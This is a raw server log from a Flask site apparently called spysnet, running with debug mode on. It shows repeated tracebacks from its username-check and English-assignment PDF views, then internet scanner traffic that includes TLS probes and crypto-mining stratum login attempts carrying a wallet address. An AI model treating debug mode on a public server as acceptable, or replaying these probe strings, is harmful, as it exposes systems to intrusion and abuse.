 * Serving Flask app 'website'
 * Debug mode: on
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
exiting...
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 883, in full_dispatch_request
    return self.finalize_request(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 902, in finalize_request
    response = self.make_response(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1174, in make_response
    raise TypeError(
TypeError: The view function for 'views.check_username' did not return a valid response. The function either returned None or ended without a return statement.
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/root/spysnet/website/views.py", line 1809, in english_assignment
    discord_log_english(f"{current_user.username} -- Making pdf for {name_and_id} with words {words} ip = {client_ip} <@709799648143081483>")
AttributeError: 'AnonymousUserMixin' object has no attribute 'username'
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 883, in full_dispatch_request
    return self.finalize_request(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 902, in finalize_request
    response = self.make_response(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1174, in make_response
    raise TypeError(
TypeError: The view function for 'views.check_username' did not return a valid response. The function either returned None or ended without a return statement.
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 883, in full_dispatch_request
    return self.finalize_request(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 902, in finalize_request
    response = self.make_response(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1174, in make_response
    raise TypeError(
TypeError: The view function for 'views.check_username' did not return a valid response. The function either returned None or ended without a return statement.
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/root/spysnet/website/views.py", line 2218, in english_assignment
    fields_data =  update_fields_data(fields_data_low, data)
  File "/root/spysnet/website/views.py", line 2078, in update_fields_data
    fields_data[f"Today's POWER WORD {i}"]["text"] = word_data["Today's POWER WORD"]
KeyError: "Today's POWER WORD"
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 883, in full_dispatch_request
    return self.finalize_request(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 902, in finalize_request
    response = self.make_response(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1174, in make_response
    raise TypeError(
TypeError: The view function for 'views.check_username' did not return a valid response. The function either returned None or ended without a return statement.
Invalid session BjazB68zf4GGRRlvAAAF (further occurrences of this error will be logged with level INFO)
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 883, in full_dispatch_request
    return self.finalize_request(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 902, in finalize_request
    response = self.make_response(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1174, in make_response
    raise TypeError(
TypeError: The view function for 'views.check_username' did not return a valid response. The function either returned None or ended without a return statement.
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/root/spysnet/website/views.py", line 2217, in english_assignment
    make_image_final('high' , 300 , 100 ,img_1_cords , img_2_cords )
  File "/root/spysnet/website/views.py", line 2208, in make_image_final
    if image.mode in ("RGBA", "P"):
UnboundLocalError: local variable 'image' referenced before assignment
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 63, in __call__
    return self.engineio_app.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/socketio/server.py", line 433, in handle_request
    return self.eio.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/engineio/server.py", line 272, in handle_request
    socket = self._get_socket(sid)
  File "/usr/local/lib/python3.10/dist-packages/engineio/base_server.py", line 229, in _get_socket
    raise KeyError('Session is disconnected')
KeyError: 'Session is disconnected'
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/root/spysnet/website/views.py", line 2260, in english_assignment
    make_image_final('low' , 30 , 10 ,img_1_cords,img_2_cords )
  File "/root/spysnet/website/views.py", line 2238, in make_image_final
    add_image(main_image, "./website/english/img2.png", img_2_cords)
  File "/root/spysnet/website/views.py", line 2220, in add_image
    added_image = Image.open(added_image_path)
  File "/usr/local/lib/python3.10/dist-packages/PIL/Image.py", line 3536, in open
    raise UnidentifiedImageError(msg)
PIL.UnidentifiedImageError: cannot identify image file '/root/spysnet/website/english/img2.png'
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 883, in full_dispatch_request
    return self.finalize_request(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 902, in finalize_request
    response = self.make_response(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1174, in make_response
    raise TypeError(
TypeError: The view function for 'views.check_username' did not return a valid response. The function either returned None or ended without a return statement.
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 883, in full_dispatch_request
    return self.finalize_request(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 902, in finalize_request
    response = self.make_response(rv)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1174, in make_response
    raise TypeError(
TypeError: The view function for 'views.check_username' did not return a valid response. The function either returned None or ended without a return statement.
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/root/spysnet/website/views.py", line 1811, in english_assignment
    discord_log_english(f"Not logged -- Making pdf for {name_and_id} with words {words} api = {api} , quality = {quality} , ip = {client_ip} <@709799648143081483>")
UnboundLocalError: local variable 'client_ip' referenced before assignment
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 74, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1476, in wsgi_app
    response = self.handle_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/local/lib/python3.10/dist-packages/flask_cors/extension.py", line 194, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/root/spysnet/website/views.py", line 1811, in english_assignment
    discord_log_english(f"Not logged -- Making pdf for {name_and_id} with words {words} api = {api} , quality = {quality} , ip = {client_ip} <@709799648143081483>")
UnboundLocalError: local variable 'client_ip' referenced before assignment
Invalid session uvUgfxM0zPRolFfvAAAM (further occurrences of this error will be logged with level INFO)
152.42.243.111 - - [21/Nov/2024 16:03:08] code 400, message Bad request version ('À\x13À')
152.42.243.206 - - [21/Nov/2024 16:03:09] code 400, message Bad request version ('À\x13À')
80.82.78.39 - - [21/Nov/2024 17:17:48] code 400, message Bad request version ('À\x13À')
80.82.77.202 - - [21/Nov/2024 18:31:50] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
65.49.1.107 - - [21/Nov/2024 19:07:39] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00{\x01\x00\x00w\x03\x03³Îx\x06¹UW\x988ÊR\x10$%_zníêç¿\x07æm\x84{dÒ\x99\x02¼$\x00\x00\x1aÀ/À+À\x11À\x07À\x13À')
93.174.93.12 - - [21/Nov/2024 20:35:53] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
185.85.239.13 - - [21/Nov/2024 21:56:46] code 400, message Bad request version ("\x02\x15\x86iÐ¤ÁîõG³úr\x82&Ð»\x17Õ\x00È\x13\x01\x13\x02\x13\x03\x13\x04\x13\x05À,À0\x00£\x00\x9fÌ©Ì¨ÌªÀ¯À\xadÀ£À\x9fÀ]ÀaÀWÀS\x00§À+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀR\x00¦À$À(\x00k\x00jÀsÀw\x00Ä\x00Ã\x00m\x00ÅÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½\x00l\x00¿À")
185.85.239.13 - - [21/Nov/2024 22:24:51] code 400, message Bad request version ('DªîWÞ}ì\x9b¾\x01\x98(\x18b)/üh¢\x86\x02ò\x8d©5ð\x16\x81"mkÍ\x00È\x13\x01\x13\x02\x13\x03\x13\x04\x13\x05À,À0\x00£\x00\x9fÌ©Ì¨ÌªÀ¯À\xadÀ£À\x9fÀ]ÀaÀWÀS\x00§À+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀR\x00¦À$À(\x00k\x00jÀsÀw\x00Ä\x00Ã\x00m\x00ÅÀ#À\'\x00g\x00@ÀrÀv\x00¾\x00½\x00l\x00¿À')
185.85.239.13 - - [21/Nov/2024 22:53:01] code 400, message Bad request version ('VÃaµ\x0f´Ë')
185.85.239.13 - - [21/Nov/2024 23:26:12] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x01ª\x01\x00\x01¦\x03\x03ç¨Â?ó\x89w\x93s\x89µÅ¸[¾@ÛËòÜÁbwµùÐ\x83®f\x05u0')
206.189.98.12 - - [21/Nov/2024 23:35:12] code 400, message Bad HTTP/0.9 request type ("\x16\x03\x01\x00{\x01\x00\x00w\x03\x03'Mì¼\x9fÝ?\x95\x01\x8c\x97z7¦:£»)¦\x9dî$w\x95x\x02ç\x19ddÜÂ\x00\x00\x1aÀ/À+À\x11À\x07À\x13À")
206.189.98.12 - - [21/Nov/2024 23:35:12] code 400, message Bad request version ('À\x14À')
152.42.243.111 - - [22/Nov/2024 00:03:07] code 400, message Bad request version ('À\x13À')
159.223.67.34 - - [22/Nov/2024 00:03:09] code 400, message Bad request version ('À\x13À')
52.234.238.239 - - [22/Nov/2024 01:30:23] code 400, message Bad request syntax ('MGLNDD_47.250.51.78_80')
167.94.145.97 - - [22/Nov/2024 02:22:10] code 505, message Invalid HTTP version (2.0)
80.82.78.39 - - [22/Nov/2024 02:33:45] code 400, message Bad request version ('°wG\x9f')
159.89.27.86 - - [22/Nov/2024 03:03:35] code 400, message Bad request version ('À\x14À')
159.89.27.86 - - [22/Nov/2024 03:03:36] code 400, message Bad request version ('À\x14À')
162.142.125.33 - - [22/Nov/2024 03:51:37] code 505, message Invalid HTTP version (2.0)
185.91.69.5 - - [22/Nov/2024 04:30:21] code 400, message Bad request version ('\x00\x04\x03\x00\x01\x02\x00')
185.91.69.5 - - [22/Nov/2024 04:30:22] code 400, message Bad request version ('["cpuminer/2.5.1"]}')
185.91.69.5 - - [22/Nov/2024 04:30:23] code 400, message Bad request version ('"EthereumStratum/1.0.0"]}')
185.91.69.5 - - [22/Nov/2024 04:30:24] code 400, message Bad request syntax ('{"id":1,"method":"eth_submitLogin","worker":"igwrcvap","params":["0xaeed3afa198ff0cba7e2f680289ed78811190a4f","x"],"jsonrpc":"2.0"}')
185.91.69.5 - - [22/Nov/2024 04:30:25] code 400, message Bad request version ('msvc/2019","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}')
80.82.77.202 - - [22/Nov/2024 04:41:49] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
198.235.24.30 - - [22/Nov/2024 07:51:56] code 400, message Bad request version ('À\x13À')
198.235.24.30 - - [22/Nov/2024 07:51:56] code 400, message Bad request syntax ('\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03ÔmV¹z(\x81ëÙÇÈÌW©úÝ\x9e§°Ï\x80ûP~é')
172.104.11.46 - - [22/Nov/2024 07:56:04] code 400, message Bad request version ('À\x13À')
152.42.243.206 - - [22/Nov/2024 08:02:58] code 400, message Bad request version ('À\x13À')
159.223.67.34 - - [22/Nov/2024 08:03:01] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x01')
78.153.140.224 - - [22/Nov/2024 08:42:29] code 400, message Bad request syntax ("\x16\x03\x01\x00¬\x01\x00\x00¨\x03\x03UØÊv\x867&\x0e'B1\x12;:,jHÛÉ/\x91pá*|BÄ#b»\x94N\x00\x008À,À")
93.174.93.12 - - [22/Nov/2024 12:27:44] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
147.185.132.61 - - [22/Nov/2024 12:30:31] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03ýÛ¬=JÆéª\x8at\x19¶o\x13ÑÍ\x0eN¶%8j³Åìó\x8a{VaöM')
147.185.132.61 - - [22/Nov/2024 12:30:32] code 400, message Bad HTTP/0.9 request type ("\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03¿±\x8a\x9du.l°%æÿ\x19{\x89\x03mà·<hh¹\x80ì\x97\x8c¶_¹V\x15É\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À")
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 63, in __call__
    return self.engineio_app.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/socketio/server.py", line 433, in handle_request
    return self.eio.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/engineio/server.py", line 272, in handle_request
    socket = self._get_socket(sid)
  File "/usr/local/lib/python3.10/dist-packages/engineio/base_server.py", line 229, in _get_socket
    raise KeyError('Session is disconnected')
KeyError: 'Session is disconnected'
184.105.139.68 - - [22/Nov/2024 14:23:34] code 400, message Bad request version ('À\x14À')
78.153.140.223 - - [22/Nov/2024 15:20:50] code 400, message Bad request syntax ('\x16\x03\x01\x00¬\x01\x00\x00¨\x03\x03Ö\x12ã')
159.223.67.34 - - [22/Nov/2024 16:03:08] code 400, message Bad request version ('À\x13À')
159.223.69.51 - - [22/Nov/2024 16:03:19] code 400, message Bad request version ('À\x13À')
185.85.239.13 - - [22/Nov/2024 18:05:08] code 400, message Bad request version (":5ð1C@t~E¸\x08¨ËñÜ\x00È\x13\x01\x13\x02\x13\x03\x13\x04\x13\x05À,À0\x00£\x00\x9fÌ©Ì¨ÌªÀ¯À\xadÀ£À\x9fÀ]ÀaÀWÀS\x00§À+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀR\x00¦À$À(\x00k\x00jÀsÀw\x00Ä\x00Ã\x00m\x00ÅÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½\x00l\x00¿À")
176.58.124.190 - - [22/Nov/2024 18:16:22] code 400, message Bad request version ('\x00\x04\x03\x00\x01\x02\x00')
176.58.124.190 - - [22/Nov/2024 18:16:22] code 400, message Bad request version ('\x00\x04\x03\x00\x01\x02\x00')
176.58.124.190 - - [22/Nov/2024 18:16:23] code 400, message Bad request version ('\x00\x04\x03\x00\x01\x02\x00')
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 63, in __call__
    return self.engineio_app.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/socketio/server.py", line 433, in handle_request
    return self.eio.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/engineio/server.py", line 272, in handle_request
    socket = self._get_socket(sid)
